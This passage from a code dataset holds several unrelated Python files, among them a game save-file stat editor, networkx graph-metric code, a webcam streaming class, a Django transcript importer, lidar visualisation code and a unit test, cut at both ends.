file.seek(offset+1)\n file.write(bytearray([0]))\n else:\n file.write(bytearray([int(hex_value[2:4],16)]))\n file.seek(offset+1)\n file.write(bytearray([int(hex_value[0:2],16)]))\n else:\n file.write(bytearray([value]))\n file.close()\n return 0\n\n\ndef mod_char(offset):\n ''' Input menu for character modification '''\n\n Str = int(input(\"Strength: \"))\n Modify(offset+12, Str, False)\n Int = int(input(\"Intelligence: \"))\n Modify(offset+14, Int, False)\n Dex = int(input(\"Dexterity: \"))\n Modify(offset+13, Dex, False)\n HP = int(input(\"Health points: \"))\n Modify(offset+16, HP, True)\n MAX_HP = int(input(\"Max health points: \"))\n Modify(offset+18, MAX_HP, True)\n Exp = int(input(\"Experience: \"))\n Modify(offset+20, Exp, True)\n\n\ndef mod_items():\n ''' Input menu for items and gold modification '''\n\n offset = 516\n gold = int(input(\"Gold: \"))\n Modify(offset, gold, True)\n keys = int(input(\"Keys: \"))\n Modify(offset+2, keys, False)\n skull = int(input(\"Skull keys: \"))\n Modify(offset+7, skull, False)\n gems = int(input(\"Gems: \"))\n Modify(offset+3, gems, False)\n badge = int(input(\"Black badge: \"))\n Modify(offset+20, badge, False)\n carpets = int(input(\"Magic carpets: \"))\n Modify(offset+6, carpets, False)\n axes = int(input(\"Magic axes: \"))\n Modify(offset+60, axes, False)\n\n\ndef menu():\n print(\"\\n---- CHARACTERS -------------------------------------------------------------------------------------\")\n data = [['[1] Main', '[2] Shamino', '[3] Iolo', '[4] Mariah', '[5] Geoffrey', '[6] Jaana'],\n ['[7] Julia', '[8] Dupre', '[9] Katrina', '[10] Sentri', '[11] Gwenno', '[12] Johne'],\n ['[13] Gorn', '[14] Maxwell', '[15] Toshi', '[16] Saduj', '[17] Equipments']]\n\n col_width = max(len(word) for row in data for word in row) + 2 # padding\n for row in data:\n print(\"\".join(word.ljust(col_width) for word in row))\n\n print(\n '-----------------------------------------------------------------------------------------------------' + '\\n')\n\n\ndef main():\n menu()\n data = ['[1] Main','[2] Shamino', '[3] Iolo', '[4] Mariah', '[5] Geoffrey', '[6] Jaana',\n '[7] Julia','[8] Dupre', '[9] Katrina', '[10] Sentri', '[11] Gwenno', '[12] Johne',\n '[13] Gorn', '[14] Maxwell', '[15] Toshi', '[16] Saduj', '[17] Equipments']\n\n again = 'Y'\n while(again == 'Y'):\n choice = input(\"Enter your choice: \")\n a = ''.join([i for i in data[int(choice)-1] if i.isalpha()]) # character's name\n if choice != '17':\n mod_char(get_offset(a))\n elif choice == '17':\n mod_items()\n else:\n print(\"Invalid input!\")\n again = input(\"Do you want to continue? [Y/N] \")\n\n return 0\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"program/Cheat.py","file_name":"Cheat.py","file_ext":"py","file_size_in_byte":4256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"282765865","text":"import os\n\nimport networkx as nx\n\n\nclass RandomGraph(object):\n def __init__(self, node_num, p, k=4, m=5, is_train=True, name='', graph_mode=\"WS\", seed=-1):\n self.node_num = node_num\n self.p = p\n self.k = k\n self.m = m\n self.graph_mode = graph_mode\n self.seed = seed\n self.name = name\n\n if is_train is True:\n print(\"is_train: True\")\n self.graph = self.make_graph()\n self.save_random_graph(self.name)\n else:\n self.graph = self.load_random_graph(self.name)\n\n self.nodes, self.in_edges = self.get_graph_info()\n\n def make_graph(self):\n\n if self.graph_mode == \"ER\":\n if self.seed == -1:\n my_graph = nx.random_graphs.erdos_renyi_graph(self.node_num, self.p)\n else:\n my_graph = nx.random_graphs.erdos_renyi_graph(self.node_num, self.p, self.seed)\n\n elif self.graph_mode == \"WS\":\n if self.seed == -1:\n my_graph = nx.random_graphs.connected_watts_strogatz_graph(self.node_num, self.k, self.p, tries=1000)\n else:\n my_graph = nx.random_graphs.connected_watts_strogatz_graph(self.node_num, self.k, self.p, 1000,\n self.seed)\n\n elif self.graph_mode == \"BA\":\n if self.seed == -1:\n my_graph = nx.random_graphs.barabasi_albert_graph(self.node_num, self.m)\n else:\n my_graph = nx.random_graphs.barabasi_albert_graph(self.node_num, self.m, self.seed)\n\n return my_graph\n\n def get_graph_info(self):\n in_edges = {0: []}\n nodes = [0]\n end = []\n for node in self.graph.nodes():\n neighbors = list(self.graph.neighbors(node))\n neighbors.sort()\n\n edges = []\n check = []\n for neighbor in neighbors:\n if node > neighbor:\n edges.append(neighbor + 1)\n check.append(neighbor)\n if not edges:\n edges.append(0)\n in_edges[node + 1] = edges\n if check == neighbors:\n end.append(node + 1)\n nodes.append(node + 1)\n in_edges[self.node_num + 1] = end\n nodes.append(self.node_num + 1)\n\n return nodes, in_edges\n\n def get_network_graph(self):\n net_graph = nx.Graph()\n\n for x in self.nodes:\n net_graph.add_node(x)\n\n for i in self.in_edges:\n for j in self.in_edges[i]:\n net_graph.add_edge(i, j, name=str(i) + '-' + str(j))\n return net_graph\n\n def get_network_di_graph(self):\n net_graph = nx.DiGraph()\n\n for x in self.nodes:\n net_graph.add_node(x)\n\n for i in self.in_edges:\n for j in self.in_edges[i]:\n net_graph.add_edge(i, j, name=str(i) + '-' + str(j))\n return net_graph\n\n def get_in_degree(self):\n in_degree = []\n for x in self.in_edges:\n in_degree.append(len(self.in_edges[x]))\n return in_degree\n\n def get_out_degree(self):\n out_degree = []\n for x in range(len(self.in_edges)):\n count = 0\n for a in self.in_edges:\n if x in self.in_edges[a]:\n count = count + 1\n out_degree.append(count)\n\n return out_degree\n\n def get_edge_metrics(self, df, connection):\n net_graph = self.get_network_graph()\n di_graph = self.get_network_di_graph()\n\n # UNDIRECTED GRAPH\n deg_centrality = nx.degree_centrality(net_graph)\n close_centrality = nx.closeness_centrality(net_graph)\n bet_centrality = nx.betweenness_centrality(net_graph)\n curr_flow_close_centrality = nx.current_flow_closeness_centrality(net_graph)\n curr_flow_bet_centrality = nx.current_flow_betweenness_centrality(net_graph)\n eigen_centrality = nx.eigenvector_centrality(net_graph)\n katz_centrality = nx.katz_centrality(net_graph)\n comm_bet_centrality = nx.communicability_betweenness_centrality(net_graph)\n load_centrality = nx.load_centrality(net_graph)\n page_rank = nx.pagerank(net_graph)\n communicability = nx.communicability(net_graph)\n average_neighbor_degree = nx.average_neighbor_degree(net_graph)\n edge_curr_flow_bet_centrality = nx.edge_current_flow_betweenness_centrality(net_graph)\n edge_load_centrality = nx.edge_load_centrality(net_graph)\n\n deg_c_a = []\n deg_c_b = []\n close_c_a = []\n close_c_b = []\n bet_c_a = []\n bet_c_b = []\n curr_flow_c_a = []\n curr_flow_c_b = []\n curr_flow_bet_centrality_a = []\n curr_flow_bet_centrality_b = []\n eigen_centrality_a = []\n eigen_centrality_b = []\n katz_centrality_a = []\n katz_centrality_b = []\n comm_bet_centrality_a = []\n comm_bet_centrality_b = []\n load_centrality_a = []\n load_centrality_b = []\n page_rank_a = []\n page_rank_b = []\n dispersion = []\n comm = []\n node_connectivity = []\n edge_connectivity = []\n avg_neighbor_degree_a = []\n avg_neighbor_degree_b = []\n edge_curr_flow_bet_cent = []\n group_bet_cent = []\n group_clo_cent = []\n group_deg_cent = []\n edge_load_cent = []\n simrank_similarity = []\n volume = []\n depth_a = []\n depth_b = []\n\n # DIRECTED GRAPH\n in_deg_centrality = nx.in_degree_centrality(di_graph)\n out_deg_centrality = nx.out_degree_centrality(di_graph)\n edge_bet_centrality = nx.edge_betweenness_centrality(di_graph)\n\n in_deg_c_a = []\n in_deg_c_b = []\n out_deg_c_a = []\n out_deg_c_b = []\n edge_bet_cent = []\n group_in_deg_cent = []\n group_out_deg_cent = []\n\n for i in connection:\n nodes = i.split('-')\n node_a = int(nodes[0])\n node_b = int(nodes[1])\n\n deg_c_a.append(deg_centrality[node_a])\n deg_c_b.append(deg_centrality[node_b])\n close_c_a.append(close_centrality[node_a])\n close_c_b.append(close_centrality[node_b])\n bet_c_a.append(bet_centrality[node_a])\n bet_c_b.append(bet_centrality[node_b])\n curr_flow_c_a.append(curr_flow_close_centrality[node_a])\n curr_flow_c_b.append(curr_flow_close_centrality[node_b])\n curr_flow_bet_centrality_a.append(curr_flow_bet_centrality[node_a])\n curr_flow_bet_centrality_b.append(curr_flow_bet_centrality[node_b])\n eigen_centrality_a.append(eigen_centrality[node_a])\n eigen_centrality_b.append(eigen_centrality[node_b])\n katz_centrality_a.append(katz_centrality[node_a])\n katz_centrality_b.append(katz_centrality[node_b])\n comm_bet_centrality_a.append(comm_bet_centrality[node_a])\n comm_bet_centrality_b.append(comm_bet_centrality[node_b])\n load_centrality_a.append(load_centrality[node_a])\n load_centrality_b.append(load_centrality[node_b])\n page_rank_a.append(page_rank[node_a])\n page_rank_b.append(page_rank[node_b])\n dispersion.append(nx.dispersion(net_graph, node_a, node_b))\n comm.append(communicability[node_a][node_b])\n node_connectivity.append((nx.node_connectivity(net_graph, node_a, node_b)))\n edge_connectivity.append(nx.edge_connectivity(net_graph, node_a, node_b))\n avg_neighbor_degree_a.append(average_neighbor_degree[node_a])\n avg_neighbor_degree_b.append(average_neighbor_degree[node_b])\n in_deg_c_a.append(in_deg_centrality[node_a])\n in_deg_c_b.append(in_deg_centrality[node_b])\n out_deg_c_a.append(out_deg_centrality[node_a])\n out_deg_c_b.append(out_deg_centrality[node_b])\n edge_bet_cent.append(edge_bet_centrality[node_b, node_a])\n if (node_b, node_a) in edge_curr_flow_bet_centrality.keys():\n edge_curr_flow_bet_cent.append(edge_curr_flow_bet_centrality[node_b, node_a])\n else:\n edge_curr_flow_bet_cent.append(edge_curr_flow_bet_centrality[node_a, node_b])\n\n group_bet_cent.append(nx.group_betweenness_centrality(net_graph, [node_a, node_b]))\n group_clo_cent.append(nx.group_closeness_centrality(net_graph, [node_a, node_b]))\n group_deg_cent.append(nx.group_degree_centrality(net_graph, [node_a, node_b]))\n group_in_deg_cent.append(nx.group_in_degree_centrality(di_graph, [node_a, node_b]))\n group_out_deg_cent.append(nx.group_out_degree_centrality(di_graph, [node_a, node_b]))\n edge_load_cent.append(edge_load_centrality[node_b, node_a])\n simrank_similarity.append(nx.simrank_similarity(net_graph, node_a, node_b))\n volume.append(nx.volume(net_graph, [node_a, node_b]))\n depth_a.append(nx.shortest_path_length(net_graph, 0, node_a))\n depth_b.append(nx.shortest_path_length(net_graph, 0, node_b))\n\n df['deg_c_a'] = deg_c_a\n df['deg_c_b'] = deg_c_b\n df['close_c_a'] = close_c_a\n df['close_c_b'] = close_c_b\n df['bet_c_a'] = bet_c_a\n df['bet_c_b'] = bet_c_b\n df['curr_flow_c_a'] = curr_flow_c_a\n df['curr_flow_c_b'] = curr_flow_c_b\n df['curr_flow_bet_centrality_a'] = curr_flow_bet_centrality_a\n df['curr_flow_bet_centrality_b'] = curr_flow_bet_centrality_b\n df['eigen_centrality_a'] = eigen_centrality_a\n df['eigen_centrality_b'] = eigen_centrality_b\n df['katz_centrality_a'] = katz_centrality_a\n df['katz_centrality_b'] = katz_centrality_b\n df['comm_bet_centrality_a'] = comm_bet_centrality_a\n df['comm_bet_centrality_b'] = comm_bet_centrality_b\n df['load_centrality_a'] = load_centrality_a\n df['load_centrality_b'] = load_centrality_b\n df['page_rank_a'] = page_rank_a\n df['page_rank_b'] = page_rank_b\n df['dispersion'] = dispersion\n df['comm'] = comm\n df['connectivity'] = node_connectivity\n df['edge_connectivity'] = edge_connectivity\n df['avg_neighbor_degree_a'] = avg_neighbor_degree_a\n df['avg_neighbor_degree_b'] = avg_neighbor_degree_b\n df['in_deg_c_a'] = in_deg_c_a\n df['in_deg_c_b'] = in_deg_c_b\n df['out_deg_c_a'] = out_deg_c_a\n df['out_deg_c_b'] = out_deg_c_b\n df['edge_bet_cent'] = edge_bet_cent\n df['edge_curr_flow_bet_centrality'] = edge_curr_flow_bet_cent\n df['group_bet_cent'] = group_bet_cent\n df['group_clo_cent'] = group_clo_cent\n df['group_deg_cent'] = group_deg_cent\n df['group_in_deg_cent'] = group_in_deg_cent\n df['group_out_deg_cent'] = group_out_deg_cent\n df['edge_load_cent'] = edge_load_cent\n df['simrank_similarity'] = simrank_similarity\n df['volume'] = volume\n df['depth_a'] = depth_a\n df['depth_b'] = depth_b\n\n return df\n\n def get_node_metrics(self, df, nodes):\n net_graph = self.get_network_graph()\n di_graph = self.get_network_di_graph()\n\n # UNDIRECTED GRAPH\n deg_centrality = nx.degree_centrality(net_graph)\n close_centrality = nx.closeness_centrality(net_graph)\n bet_centrality = nx.betweenness_centrality(net_graph)\n curr_flow_close_centrality = nx.current_flow_closeness_centrality(net_graph)\n curr_flow_bet_centrality = nx.current_flow_betweenness_centrality(net_graph)\n eigen_centrality = nx.eigenvector_centrality(net_graph)\n katz_centrality = nx.katz_centrality(net_graph)\n comm_bet_centrality = nx.communicability_betweenness_centrality(net_graph)\n load_centrality = nx.load_centrality(net_graph)\n page_r = nx.pagerank(net_graph)\n communicability = nx.communicability(net_graph)\n average_neighbor_degree = nx.average_neighbor_degree(net_graph)\n\n deg_cent = []\n close_cent = []\n bet_cent = []\n curr_flow_cent = []\n curr_flow_bet_cent = []\n eigen_cent = []\n katz_cent = []\n comm_bet_cent = []\n load_cent = []\n page_rank = []\n dispersion = []\n comm = []\n node_connectivity = []\n avg_neighbor_degree_a = []\n group_bet_cent = []\n group_clo_cent = []\n group_deg_cent = []\n volume = []\n depth = []\n\n # DIRECTED GRAPH\n in_deg_centrality = nx.in_degree_centrality(di_graph)\n out_deg_centrality = nx.out_degree_centrality(di_graph)\n\n in_deg_cent = []\n out_deg_cent = []\n group_in_deg_cent = []\n group_out_deg_cent = []\n\n for node in nodes:\n deg_cent.append(deg_centrality[node])\n close_cent.append(close_centrality[node])\n bet_cent.append(bet_centrality[node])\n curr_flow_cent.append(curr_flow_close_centrality[node])\n curr_flow_bet_cent.append(curr_flow_bet_centrality[node])\n eigen_cent.append(eigen_centrality[node])\n katz_cent.append(katz_centrality[node])\n comm_bet_cent.append(comm_bet_centrality[node])\n load_cent.append(load_centrality[node])\n page_rank.append(page_r[node])\n dispersion.append(nx.dispersion(net_graph, 0, node))\n comm.append(communicability[0][node])\n node_connectivity.append((nx.node_connectivity(net_graph, 0, node)))\n avg_neighbor_degree_a.append(average_neighbor_degree[node])\n in_deg_cent.append(in_deg_centrality[node])\n out_deg_cent.append(out_deg_centrality[node])\n group_bet_cent.append(nx.group_betweenness_centrality(net_graph, [0, node]))\n group_clo_cent.append(nx.group_closeness_centrality(net_graph, [0, node]))\n group_deg_cent.append(nx.group_degree_centrality(net_graph, [0, node]))\n group_in_deg_cent.append(nx.group_in_degree_centrality(di_graph, [0, node]))\n group_out_deg_cent.append(nx.group_out_degree_centrality(di_graph, [0, node]))\n volume.append(nx.volume(net_graph, [0, node]))\n depth.append(nx.shortest_path_length(net_graph, 0, node))\n\n df['deg_cent'] = deg_cent\n df['close_cent'] = close_cent\n df['bet_cent'] = bet_cent\n df['curr_flow_cent'] = curr_flow_cent\n df['curr_flow_bet_cent'] = curr_flow_bet_cent\n df['eigen_cent'] = eigen_cent\n df['katz_cent'] = katz_cent\n df['comm_bet_cent'] = comm_bet_cent\n df['load_cent'] = load_cent\n df['page_rank'] = page_rank\n df['dispersion'] = dispersion\n df['comm'] = comm\n df['connectivity'] = node_connectivity\n df['avg_neighbor_degree_a'] = avg_neighbor_degree_a\n df['in_deg_cent'] = in_deg_cent\n df['out_deg_cent'] = out_deg_cent\n df['group_bet_cent'] = group_bet_cent\n df['group_clo_cent'] = group_clo_cent\n df['group_deg_cent'] = group_deg_cent\n df['group_in_deg_cent'] = group_in_deg_cent\n df['group_out_deg_cent'] = group_out_deg_cent\n df['volume'] = volume\n df['depth'] = depth\n return df\n\n def save_random_graph(self, path):\n if not os.path.isdir(\"saved_graph\"):\n os.mkdir(\"saved_graph\")\n nx.write_yaml(self.graph, \"./saved_graph/\" + path)\n\n def load_random_graph(self, path):\n print(path)\n self.graph = nx.read_yaml(\"./saved_graph/\" + path)\n return self.graph\n","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":15663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"519837074","text":"class Solution:\n \"\"\"\n @param target: the target\n @param array: an array\n @return: the closest value\n \"\"\"\n\n def closestTargetValue(self, target, array):\n if not array or len(array) < 2:\n return -1\n\n array.sort()\n # print(array)\n result = -1\n left, right = 0, len(array) - 1\n while left < right:\n sum = array[left] + array[right]\n # print(sum)\n if sum < target:\n left += 1\n result = sum if abs(target - sum) < abs(target - result) else result\n elif sum > target:\n right -= 1\n else:\n return target\n\n return result","sub_path":"1478. Closest Target Value.py","file_name":"1478. Closest Target Value.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"67301376","text":"#!/usr/bin/env python\n# From https://gist.github.com/allskyee/7749b9318e914ca45eb0a1000a81bf56\n# This works for USB camera. Not for the Raspberry Pi Camera.\n\nfrom threading import Thread, Lock\nimport cv2\n\nclass WebcamVideoStream :\n def __init__(self, src=0, width=640, height=480) :\n self.stream = cv2.VideoCapture(src)\n self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width) # modified for opencv v3\n self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)\n (self.grabbed, self.frame) = self.stream.read()\n self.started = False\n self.read_lock = Lock()\n\n def start(self) :\n if self.started :\n print(\"already started!\")\n return None\n self.started = True\n self.thread = Thread(target=self.update, args=())\n self.thread.start()\n return self\n\n def update(self) :\n while self.started :\n (grabbed, frame) = self.stream.read()\n with self.read_lock:\n self.grabbed, self.frame = grabbed, frame\n\n def read(self) :\n with self.read_lock:\n frame = self.frame.copy()\n return frame\n\n def stop(self) :\n self.started = False\n self.thread.join()\n\n def __exit__(self, exc_type, exc_value, traceback) :\n self.stream.release()\n\nif __name__ == \"__main__\" :\n vs = WebcamVideoStream().start()\n while True :\n frame = vs.read()\n cv2.imshow('webcam', frame)\n \n key = cv2.waitKey(1) & 0xFF\n if key == ord(\"q\"):\n break\n\n vs.stop()\n cv2.destroyAllWindows()\n","sub_path":"opencv_usb_camera_multithread.py","file_name":"opencv_usb_camera_multithread.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"562302373","text":"import http.client\nimport json\nfrom os.path import join\nfrom urllib.parse import quote\n\nfrom django.conf import settings\nfrom django.core.management import call_command\nfrom django.core.management.base import BaseCommand\nfrom textgrid import TextGrid\n\n\nfrom 臺灣言語資料庫.資料模型 import 來源表\nfrom 臺灣言語資料庫.資料模型 import 影音表\nfrom 臺灣言語資料庫.資料模型 import 版權表\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **參數):\n call_command('顯示資料數量')\n\n 公家內容 = {\n '收錄者': 來源表.objects.get_or_create(名='系統管理員')[0].編號(),\n '來源': 來源表.objects.get_or_create(名='Pigu')[0].編號(),\n '版權': 版權表.objects.get_or_create(版權='會使公開')[0].pk,\n '種類': '語句',\n '語言腔口': '閩南語',\n '著作所在地': '臺北',\n '著作年': '2016',\n }\n 資料目錄 = join(settings.BASE_DIR, 'data')\n\n 匯入數量 = 0\n for 檔名 in ['a001-2', 'a002-2', 'a003-2', 'a004-2', 'a005', 'a006', 'b007']:\n with open(join(資料目錄, 檔名 + '.TextGrid')) as fp:\n grid = TextGrid(fp.read())\n for tier in grid:\n json資料 = []\n for 開始時間, 結束時間, 內容 in (tier.simple_transcript):\n if 內容.strip() not in ['sounding', 'silent']:\n json資料.append({\n '內容': self.揣分詞(內容),\n '語者': '無註明',\n '開始時間': str(float(開始時間) - 0.10),\n '結束時間': str(float(結束時間) + 0.15),\n })\n 影音內容 = {'影音所在': join(資料目錄, 檔名 + '.wav')}\n 影音內容.update(公家內容)\n 影音 = 影音表.加資料(影音內容)\n\n 聽拍內容 = {'聽拍資料': json資料}\n 聽拍內容.update(公家內容)\n 影音.寫聽拍(聽拍內容)\n\n 匯入數量 += 1\n if 匯入數量 % 100 == 0:\n print('匯入第{}筆:'.format(匯入數量))\n\n call_command('顯示資料數量')\n\n def 揣分詞(self, 音標):\n conn = http.client.HTTPConnection(\"140.109.16.144\")\n conn.request(\n \"GET\",\n \"/%E6%A8%99%E6%BC%A2%E5%AD%97%E9%9F%B3%E6%A8%99?%E6%9F%A5%E8%A9%A2%E8%85%94%E5%8F%A3=%E9%96%A9%E5%8D%97%E8%AA%9E&%E6%9F%A5%E8%A9%A2%E8%AA%9E%E5%8F%A5=\" +\n quote(音標)\n )\n r1 = conn.getresponse()\n if r1.status != 200:\n print(r1.status, r1.reason)\n print(音標)\n raise RuntimeError()\n data1 = r1.read() # This will return entire content.\n return json.loads(data1.decode('utf-8'))['分詞']\n","sub_path":"praat/management/commands/匯入tan5.py","file_name":"匯入tan5.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"572636652","text":"from bert import ODQA\n\n\nmodel = ODQA('model')\n\nwith open(\"content.txt\", \"r\") as data:\n content = data.read()\n\nquestion = input(\"Enter Your Question: \")\n\nanswer = model.predict(content,question)\n\nprint(answer['answer'])\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"603597141","text":"import os, requests, logging\nfrom django.core.management.base import BaseCommand, CommandError\nfrom ...actions import create_asset, sync_with_github\nfrom ...tasks import async_sync_with_github\nfrom ...models import Asset\n\nlogger = logging.getLogger(__name__)\n\nHOST_ASSETS = 'https://assets.breatheco.de/apis'\n\n\nclass Command(BaseCommand):\n help = 'Sync exercises and projects from old breathecode'\n\n def add_arguments(self, parser):\n parser.add_argument('entity', type=str)\n parser.add_argument(\n '--override',\n action='store_true',\n help='Delete and add again',\n )\n parser.add_argument('--limit',\n action='store',\n dest='limit',\n type=int,\n default=0,\n help='How many to import')\n\n def handle(self, *args, **options):\n try:\n func = getattr(self, options['entity'], 'entity_not_found')\n except TypeError:\n print(f'Sync method for {options[\"entity\"]} no Found!')\n func(options)\n\n def projects(self, *args, **options):\n projects = Asset.objects.filter(asset_type='PROJECT')\n for p in projects:\n async_sync_with_github.delay(p.slug)\n","sub_path":"breathecode/registry/management/commands/resync_registry.py","file_name":"resync_registry.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"488985166","text":"#######################################################################\n## Objeto que representa un comando \t ##\n#######################################################################\n\n## Importa objeto padre\nfrom objects import Thing\n\n## Definicion del objeto\nclass Command(Thing):\n \n ## Constructor\n def __init__(self, alias):\n ## Inicializa el objeto padre\n Thing.__init__(self)\n\n ## Fija el nombre del comando\n self.alias = alias","sub_path":"objects/Command.py","file_name":"Command.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"427768027","text":"\n\nimport numpy as np\nimport mayavi.mlab as mlab\n\n\n# pts_mode='sphere'\ndef draw_lidar(\n pc,\n color=None,\n fig=None,\n bgcolor=(0, 0, 0),\n pts_scale=0.3,\n pts_mode=\"sphere\",\n pts_color=None,\n color_by_intensity=False,\n pc_label=False,\n):\n \"\"\" Draw lidar points\n Args:\n pc: numpy array (n,3) of XYZ\n color: numpy array (n) of intensity or whatever\n fig: mayavi figure handler, if None create new one otherwise will use it\n Returns:\n fig: created or used fig\n \"\"\"\n # ind = (pc[:,2]< -1.65)\n # pc = pc[ind]\n pts_mode = \"point\"\n print(\"====================\", pc.shape)\n if fig is None:\n fig = mlab.figure(\n figure=None, bgcolor=bgcolor, fgcolor=None, engine=None, size=(1600, 1000)\n )\n if color is None:\n color = pc[:, 2]\n if pc_label:\n color = pc[:, 4]\n if color_by_intensity:\n color = pc[:, 2]\n\n mlab.points3d(\n pc[:, 0],\n pc[:, 1],\n pc[:, 2],\n color,\n color=pts_color,\n mode=pts_mode,\n colormap=\"gnuplot\",\n scale_factor=pts_scale,\n figure=fig,\n )\n\n # draw origin\n mlab.points3d(0, 0, 0, color=(1, 1, 1), mode=\"sphere\", scale_factor=0.2)\n\n # draw axis\n axes = np.array(\n [[2.0, 0.0, 0.0, 0.0], [0.0, 2.0, 0.0, 0.0], [0.0, 0.0, 2.0, 0.0]],\n dtype=np.float64,\n )\n mlab.plot3d(\n [0, axes[0, 0]],\n [0, axes[0, 1]],\n [0, axes[0, 2]],\n color=(1, 0, 0),\n tube_radius=None,\n figure=fig,\n )\n mlab.plot3d(\n [0, axes[1, 0]],\n [0, axes[1, 1]],\n [0, axes[1, 2]],\n color=(0, 1, 0),\n tube_radius=None,\n figure=fig,\n )\n mlab.plot3d(\n [0, axes[2, 0]],\n [0, axes[2, 1]],\n [0, axes[2, 2]],\n color=(0, 0, 1),\n tube_radius=None,\n figure=fig,\n )\n\n # draw fov (todo: update to real sensor spec.)\n fov = np.array(\n [[20.0, 20.0, 0.0, 0.0], [20.0, -20.0, 0.0, 0.0]], dtype=np.float64 # 45 degree\n )\n\n mlab.plot3d(\n [0, fov[0, 0]],\n [0, fov[0, 1]],\n [0, fov[0, 2]],\n color=(1, 1, 1),\n tube_radius=None,\n line_width=1,\n figure=fig,\n )\n mlab.plot3d(\n [0, fov[1, 0]],\n [0, fov[1, 1]],\n [0, fov[1, 2]],\n color=(1, 1, 1),\n tube_radius=None,\n line_width=1,\n figure=fig,\n )\n\n # draw square region\n TOP_Y_MIN = -20\n TOP_Y_MAX = 20\n TOP_X_MIN = 0\n TOP_X_MAX = 40\n TOP_Z_MIN = -2.0\n TOP_Z_MAX = 0.4\n\n x1 = TOP_X_MIN\n x2 = TOP_X_MAX\n y1 = TOP_Y_MIN\n y2 = TOP_Y_MAX\n mlab.plot3d(\n [x1, x1],\n [y1, y2],\n [0, 0],\n color=(0.5, 0.5, 0.5),\n tube_radius=0.1,\n line_width=1,\n figure=fig,\n )\n mlab.plot3d(\n [x2, x2],\n [y1, y2],\n [0, 0],\n color=(0.5, 0.5, 0.5),\n tube_radius=0.1,\n line_width=1,\n figure=fig,\n )\n mlab.plot3d(\n [x1, x2],\n [y1, y1],\n [0, 0],\n color=(0.5, 0.5, 0.5),\n tube_radius=0.1,\n line_width=1,\n figure=fig,\n )\n mlab.plot3d(\n [x1, x2],\n [y2, y2],\n [0, 0],\n color=(0.5, 0.5, 0.5),\n tube_radius=0.1,\n line_width=1,\n figure=fig,\n )\n\n # mlab.orientation_axes()\n mlab.view(\n azimuth=180,\n elevation=70,\n focalpoint=[12.0909996, -1.04700089, -2.03249991],\n distance=62.0,\n figure=fig,\n )\n return fig\n\n\ndef load_res_data(filename):\n data_list = []\n with open(filename, \"r\") as f:\n for line in f.readlines():\n line = line.rstrip()\n if len(line) == 0:\n continue\n #data = np.array([float(s) for s in line.split(\" \")])\n data_list.append( np.fromstring(line, dtype=float, sep=' ') )\n return np.stack(data_list, axis = 0)\n\n\n# load detecting results with \npts_res = load_res_data('res_03.txt')\n#draw_lidar(pts_res)\nchoice = np.where(pts_res[:,3]>0)\npts_car = pts_res[choice, :].squeeze()\n#pts_car = np.multiply(pts_res, pts_res[:,3].reshape(-1,1))\n#draw_lidar(pts_car)\n\n\n\nfile_dir = \"train_03.bin\"\npc = np.fromfile(file_dir, dtype=np.float32).reshape(-1, 4) # load velodyne data\n#x_flag = pc[:,0]>0\n#pc = pc[x_flag, :]\n#fig = draw_lidar(pc)\n\n\n'''\n\nmlab.close()\n\n'''\n\n'''\n\n# Create the data.\nfrom numpy import pi, sin, cos, mgrid\ndphi, dtheta = pi/250.0, pi/250.0\n[phi,theta] = mgrid[0:pi+dphi*1.5:dphi,0:2*pi+dtheta*1.5:dtheta]\nm0 = 4; m1 = 3; m2 = 2; m3 = 3; m4 = 6; m5 = 2; m6 = 6; m7 = 4;\nr = sin(m0*phi)**m1 + cos(m2*phi)**m3 + sin(m4*theta)**m5 + cos(m6*theta)**m7\nx = r*sin(phi)*cos(theta)\ny = r*cos(phi)\nz = r*sin(phi)*sin(theta)\n\n# View it.\nfrom mayavi import mlab\ns = mlab.mesh(x, y, z)\nmlab.show()\n\n\n'''\n\n\n","sub_path":"mycode/test_pts.py","file_name":"test_pts.py","file_ext":"py","file_size_in_byte":4849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"308961128","text":"import unittest\nimport DataHelper as dh\nfrom collections import OrderedDict\n\n# AAA: assign, action and assert\nclass TestDataHelper(unittest.TestCase):\n def test_crud_fish(self):\n # assign for add\n data_helper = dh.DataHelper()\n amount_was = data_helper.get_fishes().__len__()\n fish = OrderedDict([('FishName', 'Salmon'), ('Description', 'from Alaska'), ('ImageUrl', '')])\n\n # action for add\n data_helper.add_fish(fish['FishName'], fish['Description'], fish['ImageUrl'])\n\n # assert for add\n last_fish = data_helper.get_fishes()[amount_was]\n\n last_fish_props = []\n for prop in last_fish:\n last_fish_props.append(prop)\n last_fish_props = last_fish_props[1:]\n\n fish_props = fish.values()\n\n self.assertTrue(set(last_fish_props) == set(fish_props))\n self.assertEquals(amount_was, data_helper.get_fishes().__len__() - 1)\n\n # assign for update\n new_fish = OrderedDict([('FishName', 'Sharky'), ('Description', 'from Cat Eak cartoon'), ('ImageUrl', '')])\n last_id = data_helper.get_fishes()[amount_was][0]\n\n # action for update\n data_helper.update_fish(last_id, new_fish['FishName'], new_fish['Description'], new_fish['ImageUrl'])\n\n # assign for update\n last_fish = data_helper.get_fishes()[amount_was]\n\n last_fish_props = []\n for prop in last_fish:\n last_fish_props.append(prop)\n last_fish_props = last_fish_props[1:]\n\n new_fish_props = 